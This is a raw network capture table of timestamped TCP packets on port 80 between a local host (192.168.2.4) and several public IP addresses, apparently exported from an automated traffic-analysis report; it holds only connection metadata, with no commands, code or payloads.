                                                      Sep 11, 2024 11:18:07.814496994 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:07.819418907 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:08.258095980 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:08.258289099 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:09.325052977 CEST6332580192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:09.330508947 CEST80633253.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:10.343126059 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:10.349684000 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:10.349802017 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:10.359231949 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:10.365390062 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:11.092897892 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:11.092972994 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:11.093970060 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:11.094031096 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:11.872617960 CEST6332680192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.036500931 CEST80633263.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.890500069 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.895430088 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.895559072 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.906126022 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:12.911036968 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911061049 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911071062 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911122084 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911132097 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911237955 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911267042 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911324978 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:12.911334991 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:13.362245083 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:13.362343073 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:14.418711901 CEST6332780192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:14.423676968 CEST80633273.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.440284014 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.445321083 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.445422888 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.461708069 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.468009949 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.905046940 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.905201912 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:15.905253887 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.908864021 CEST6332880192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:18:15.913628101 CEST80633283.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:18:21.098649025 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:21.103533030 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:21.103676081 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:21.117927074 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:21.123251915 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311043978 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311181068 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311203957 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311219931 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311234951 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311249018 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311264038 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311279058 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311294079 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311309099 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311325073 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311407089 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.311407089 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.311407089 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.311614990 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.311729908 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.317779064 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317794085 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317809105 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317823887 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317841053 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317854881 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317859888 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.317872047 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317888975 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.317919016 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.318089008 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.318609953 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318684101 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318700075 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318828106 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318845034 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.318860054 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.319152117 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319168091 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319183111 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319195986 CEST806332967.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:22.319219112 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.321676016 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:22.624394894 CEST6332980192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.641534090 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.647141933 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:23.650656939 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.663914919 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:23.672373056 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239707947 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239788055 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239837885 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239885092 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239922047 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.239928007 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239962101 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.239969969 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.239984035 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.240005016 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.240026951 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.240034103 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.240137100 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.240151882 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.241981030 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.246325016 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.246347904 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.246362925 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.246423006 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.247021914 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.247103930 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.327253103 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327265978 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327275991 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327286959 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.327505112 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.332431078 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332443953 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332456112 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332472086 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.332483053 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.332775116 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.337217093 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337229013 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337239027 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337249994 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337260008 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.337275028 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.337379932 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:24.342062950 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.342075109 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.342083931 CEST806333067.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:24.342200994 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:25.168761969 CEST6333080192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.187666893 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.193666935 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.194283009 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.204415083 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.210875034 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210890055 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210902929 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210916996 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.210932016 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211457968 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211472034 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211487055 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.211499929 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797095060 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797116041 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797132969 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797148943 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797159910 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.797164917 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797189951 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.797220945 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.797333956 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.798088074 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798104048 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798120022 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798144102 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.798264027 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.798302889 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.802201986 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802217960 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802233934 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802262068 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.802567005 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.802608013 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.885519981 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885536909 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885591984 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.885664940 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885679007 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885694981 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885723114 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.885827065 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885842085 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.885867119 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.886379957 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.886394024 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.886418104 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.886543036 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.886589050 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.886642933 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887195110 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887209892 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887224913 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887238979 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.887239933 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887286901 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.887777090 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887824059 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:26.887914896 CEST806333167.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:26.887958050 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:27.715734959 CEST6333180192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.734641075 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.739615917 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:28.739701033 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.747967958 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:28.753993034 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.321966887 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322052956 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322088003 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322119951 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322185040 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322218895 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322259903 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322294950 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322326899 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322350025 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322401047 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322433949 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322457075 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.322508097 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.322554111 CEST6333280192.168.2.467.223.117.189
                                                      Sep 11, 2024 11:18:29.327617884 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327642918 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327661991 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:18:29.327680111 CEST806333267.223.117.189192.168.2.4
                                                      Sep 11, 2024 11:19:48.378230095 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:48.918927908 CEST6335580192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.941896915 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.946899891 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:49.947125912 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.953535080 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:49.958538055 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:50.920229912 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:50.920298100 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:50.920420885 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:50.922954082 CEST6335680192.168.2.4104.21.11.31
                                                      Sep 11, 2024 11:19:50.927655935 CEST8063356104.21.11.31192.168.2.4
                                                      Sep 11, 2024 11:19:55.965629101 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:55.976468086 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:55.976743937 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:55.986718893 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:55.993038893 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:56.435580969 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:56.435595036 CEST8063357188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:56.435700893 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:57.497056961 CEST6335780192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.515767097 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.521693945 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.527710915 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.536246061 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:19:58.541738033 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.981581926 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.981991053 CEST8063358188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:19:58.982043028 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:00.047655106 CEST6335880192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.063056946 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.067986012 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.068058014 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.082154036 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:01.087598085 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087609053 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087616920 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087620974 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087629080 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087639093 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087649107 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087657928 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.087738037 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.543066025 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.543495893 CEST8063359188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:01.547657967 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:02.590848923 CEST6335980192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.611649036 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.617660999 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:03.623640060 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.627640963 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:03.633013010 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:04.080636978 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:04.080693007 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:04.080885887 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:04.083642960 CEST6336080192.168.2.4188.114.97.3
                                                      Sep 11, 2024 11:20:04.089278936 CEST8063360188.114.97.3192.168.2.4
                                                      Sep 11, 2024 11:20:09.755656004 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:09.764311075 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:09.764522076 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:09.775651932 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:09.780797005 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:10.229926109 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:10.230010033 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:11.278511047 CEST6336180192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:11.283483982 CEST80633613.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.297652006 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:12.302777052 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.303778887 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:12.315643072 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:12.320472956 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.762411118 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:12.762485981 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:13.827655077 CEST6336280192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:13.832870960 CEST80633623.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.844801903 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:14.851836920 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.851913929 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:14.867248058 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:14.872250080 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872270107 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872282982 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872294903 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872307062 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872514963 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872526884 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872539043 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:14.872550964 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:15.332469940 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:15.332520008 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:16.372190952 CEST6336380192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:16.377065897 CEST80633633.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.390634060 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.395531893 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.395622969 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.402164936 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.406986952 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.879173040 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.879319906 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:17.882452965 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.885723114 CEST6336480192.168.2.43.33.130.190
                                                      Sep 11, 2024 11:20:17.890518904 CEST80633643.33.130.190192.168.2.4
                                                      Sep 11, 2024 11:20:23.298901081 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:23.303859949 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:23.303944111 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:23.318247080 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:23.323198080 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:24.193732023 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:24.194000006 CEST8063365206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:24.194164991 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:24.825638056 CEST6336580192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:25.843858004 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:26.267493963 CEST8063366206.119.82.134192.168.2.4
                                                      Sep 11, 2024 11:20:26.267869949 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:26.277415037 CEST6336680192.168.2.4206.119.82.134
                                                      Sep 11, 2024 11:20:26.282330990 CEST8063366206.119.82.134192.168.2.4
